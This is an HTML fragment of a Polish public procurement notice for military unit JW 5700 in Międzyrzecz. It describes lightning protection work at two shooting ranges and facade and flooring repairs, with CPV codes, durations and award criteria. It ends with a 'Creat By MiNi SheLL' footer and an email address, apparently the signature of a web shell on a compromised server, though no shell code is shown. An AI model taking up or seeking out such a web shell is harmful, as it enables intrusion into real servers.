<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> wykonaniu instalacji odgromowej w bud. nr 2 na strzelnicy Nietoperek w JW 5700 w m. Międzyrzecz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia:
a) roboty przygotowawcze:
- opracowanie dokumentacji projektowej na wykonanie instalacji odgromowej,
b) roboty ziemne:
- wykonanie i zasypanie wykopów liniowych,
c) roboty elektryczne:
- wykonanie instalacji odgromowej, 
- wykonanie linii zasilających, 
- montaż opraw oświetleniowych, 
- montaż grzejnika elektrycznego, 
- montaż złącza kablowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.23.11-0, 45.31.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. termin wykonania - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> wykonanie instalacji odgromowej w bud. nr 2 na strzelnicy Wojciechowo w JW 5700 w m. Międzyrzecz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia:
a) roboty przygotowawcze:
- opracowanie dokumentacji projektowej na wykonanie instalacji odgromowej,
b) roboty ziemne:
- wykonanie i zasypanie wykopów liniowych,
c) roboty elektryczne:
- wykonanie instalacji odgromowej, 
- wykonanie linii zasilających, 
- montaż opraw oświetleniowych, 
- montaż grzejnika elektrycznego, 
- montaż złącza kablowego,
- wymiana rozdzielnicy elektrycznej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.23.11-0, 45.31.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. termin wykonania - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> naprawa elewacji, roboty malarskie i posadzkowe w bud. nr 40 i 69 w JW 5700 w m. Międzyrzecz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia:
a) roboty rozbiórkowe:
- odbicie luźnych fragmentów tynków zewnętrznych, 
- rozebranie naświetli z pustaków szklanych, 
- rozbiórka spękanych fragmentów posadzek betonowych, 
- wywiezienie i utylizacja gruzu,
b) roboty posadzkowe:
- wykonanie posadzki betonowej, 
- wzmocnienie obrzeża kanału kątownikiem, 
- przykrycie otworu kanału balami drewnianymi,
c) roboty budowlane:
- uzupełnienie tynków zewnętrznych, 
- położenie tynku strukturalnego, 
- montaż naświetli z PCV, 
- wykonanie tynków wewnętrznych, 
- malowanie tynków wewnętrznych, 
- czyszczenie i malowanie konstrukcji stalowych, wentylatorów dachowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.44.30.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. termin wykonania - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com